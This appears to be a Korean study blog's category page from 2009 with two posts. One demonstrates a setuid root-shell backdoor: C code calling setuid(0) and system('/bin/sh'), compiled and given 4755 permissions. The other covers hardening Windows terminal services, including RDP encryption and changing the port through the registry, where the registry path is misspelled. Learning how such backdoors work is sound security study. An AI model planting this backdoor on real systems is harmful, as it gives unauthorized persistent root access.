'보안'에 해당되는 글 2건

  1. 2009.09.07 SetUID를 이용한 해킹
  2. 2009.09.07 터미널 서비스 보안
예전것/Linux Basic2009. 9. 7. 22:16

SetUID를 이용한 해킹


SetUID는 보안에 치명적일수 있다고 전에 배웠다.
참고 : http://cheesev.tistory.com/entry/aboutSetUID

위 그림처럼 원본의 bash쉘을 /tmp 에 복사하고 4755 권한을 주었다.


원래 SetUID개념이라면 root권한으로 실행이 되어서 rm -rf 명령으로 지워져야하지만 이에 대한 보안노력이 있어 잘 먹히지 않는다. 약간의 트릭으로 이를 피해보자

backdoor.c라는 소스를 코딩하여 컴파일
#include<stdio.h>
main(){
        setuid(0);
        setgid(0);
        system("/bin/sh");
}

#gcc -o backdoor backdoor.c
#chmod 4755 backdoor
을 수행한후

#./backdoor
를 쳐보면

쉘 권한이 바뀐것을 볼 수있다.

아까 지우지 못했던 파일하나를 지워보자. 지워진다.



'예전것 > Linux Basic' 카테고리의 다른 글

vmware tool 설치 팁.  (0) 2010.06.03
vi setting  (0) 2010.04.02
find 옵션에 +,- 붙은것들  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
rlogin, rsh 설치  (0) 2009.08.07
카테고리 없음2009. 9. 7. 17:03

터미널 서비스 보안


문제
1. 중요한 데이터를 클라이언트에서 서버로, 그리고 서버에서 클라이언트로
전송되는 데이터를 128Bit로 암호화 하고 기본 윈도우 인증 체계를 사용하도록
설정하시오. (암호화 수준 : 높음)

2. 기본적인 터미널 서비스 포트 3389/tcp를 10004포트로 변경하시오.

step 1

제어판 - 관리 도구 - 터미널 서비스 구성 - 연결 - RDP-Tcp 더블 클릭
(암호화 수준을 '높음'으로 수정하고, '표준 Windows 인증 사용' 체크)


step 2

내 컴퓨터\HKEY_LOCAL_MACHINE\SYSTEM\CurrnetControlSet\Control\Terminal Server\WinStations\RDP-Tcp
내 컴퓨터\HKEY_LOCAL_MACHINE\SYSTEM\CurrnetControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
('PortNumber'를 10004로 수정)

티스토리툴바